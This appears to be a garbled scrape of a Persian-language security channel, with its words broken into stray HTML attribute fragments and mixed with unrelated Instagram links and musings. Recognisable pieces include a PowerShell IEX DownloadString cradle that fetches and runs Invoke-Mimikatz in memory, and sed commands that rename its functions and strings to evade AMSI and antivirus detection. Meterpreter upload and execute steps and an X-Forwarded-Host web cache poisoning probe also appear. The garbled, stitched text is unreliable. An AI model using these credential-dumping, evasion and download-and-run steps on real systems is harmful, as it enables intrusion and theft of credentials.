73.execute=”” empirehttp:=”” www.powershellempire.com=”” ?page_id=”151 #Mimikatz” blocking=”” detecting=”” گیری=”” باشه…خب=”” fud=”” بشیم,=”” plaintexts=”” kerberos=”” میدهد,=”” number=”” سازگاری=”” داره,=”” تجربیاتی=”” بیاوریدopen=”” cmd1.powershell=”” “iex=”” net.webclient).downloadstring=”” (‘https:=”” powershellmafia=”” powersploit=”” raw=”” exfiltration=”” invoke-mimikatz.ps1’);invoke-mimikatz”=”” iex=”” بلاکی=”” باشه?=”” ثابت=”” نمیشود=”” کدها=”” نخواهند=”” مکانیزمی=”” هستhttps:=”” nf-amsi-amsiscanstringاین=”” just=”” مامور=”” detector=”” ثابتی=”” میدیمgo=”” invoke-mimikatz.ps1=”” invoke-mimikatz=”” invoke-mimidogz=”” invoke-mimikatz.ps1;sed=”” <#=”” #>=”” c\\’=”” ^[[:space:]]*#.*$=”” dumpcreds=”” dumpcred=”” argumentptr=”” nottodaypal=”” calldllmainsc1=”” thisisnotthestringyouarelookingfor=”” “s=”” \-win32functions=”” \$win32functions$=”” \-win32functions\$win32functions=”” #\-=”” g”=”” upload=”” تستی=”” گرفتم=”” باپیس=”” هستش…meterpreter=”” command3.upload=”” 4.execute=”” bypass”=”” 5.execute=”” import-module=”” .\invoke-mimikatz.ps1″=”” 6.execute=”” invoke-mimidogz”=”” gentilkiwi=”” releaseshttps:=”” #neanderthal=”” manبرخی=”” وحشیانه=”” بلدیست=”” سطحی=”” رفتارها=”” تخصص=”” علمی=”” فخر=”” ماست,=”” آنهایی=”” مارا=”” صرفاً=”” خواندن=”” متهم=”” هایشان=”” میگذارند:)https:=”” bvw1-lwhwab=”” ?utm_source=”ig_share_sheet&igshid=1l638b9dm1b0dhttps://www.instagram.com/p/BvW15f-H19Q/?utm_source=ig_share_sheet&igshid=z3igujdw36yxhttps://www.instagram.com/p/BvW1ydRnkDH/?utm_source=ig_share_sheet&igshid=1ud08v1vmgjao#Forecast” apocalypseنگاه=”” عمیق=”” چرایی=”” خلق=”” بشریت=”” گیرد,=”” بُعد=”” ظریف=”” اکتشاف=”” شود,=”” نیافتنی=”” رساند…سندی=”” باب=”” پیوست=”” 1355=”” شمسی=”” اینترنتی=”” نیامده=”” بود… #web=”” cache=”” poisoningدر=”” wcp=”” پرداخت=”” cdns=”” پذیری…. علت=”” چیست=”” بزنم=”” صوتی=”” هاردتون=”” نداشتید=”” مجبور=”” بودید=”” هرباری=”” میخواستید=”” آهنگ=”” گوش=”” میزدید=”” میکردید=”” وسیع=”” چقدر=”” میرفت,=”” caching=”” وبسایب=”” صفحاتی=”” هفته=”” معاف=”” js-css-html-jpg-svg=”” صفحات=”” مناطق=”” authenticate=”” شد,=”” مواقعی=”” کارشون=”” سرورهای=”” واسط=”” میکنند,شما=”” میخواسته=”” کمکی=”” نمیره=”” کاربران=”” موثر=”” ایرادات=”” بخشی=”” پارس=”” کاربر,=”” پارامتری=”” cache-control=”” flush=”” میکنمakamai-cloudflare-varnish-aws-fastly-nginx=”” poisoning=”” میریم,=”” requset=”” x-forwarded-host=”” داره,get=”” en?cb=”1″ www.redhat.com=”” x-forwarded-host:=”” canary=”” cache-control:=”” public,=”” no-cache=”” <meta=””>
0
0